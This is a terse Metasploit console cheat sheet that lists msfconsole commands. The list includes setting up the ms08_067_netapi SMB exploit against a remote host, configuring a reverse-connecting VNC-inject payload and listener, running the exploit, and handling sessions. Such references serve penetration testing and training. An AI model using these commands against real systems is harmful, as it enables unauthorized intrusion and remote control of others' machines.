msfconsole -h
msfgui
Armitage

connect -s www.metasploit.com 443
ping x.x.x.x

show exploits|payloads|encoders|auxiliary|nops
info exploit|payload
use exploit/windows/smb/ms08_067_netapi
show options|targets|advanced|evasion

show options
set|unset rhost 119.67.45.2
set|unset lhost 192.168.1.45
set rport 445
set lport 443
set payload windows/vncinject/reverse_tcp_dns
exploit [-j]
back
sessions -l
sessions -i ID
_______________________________
connect x.x.x.x
kill 0
load pcap_log
loadpath ./
unload plugin_name
setg|unsetg

resource karma.rc
search name|path|type|author|cve|platform:aix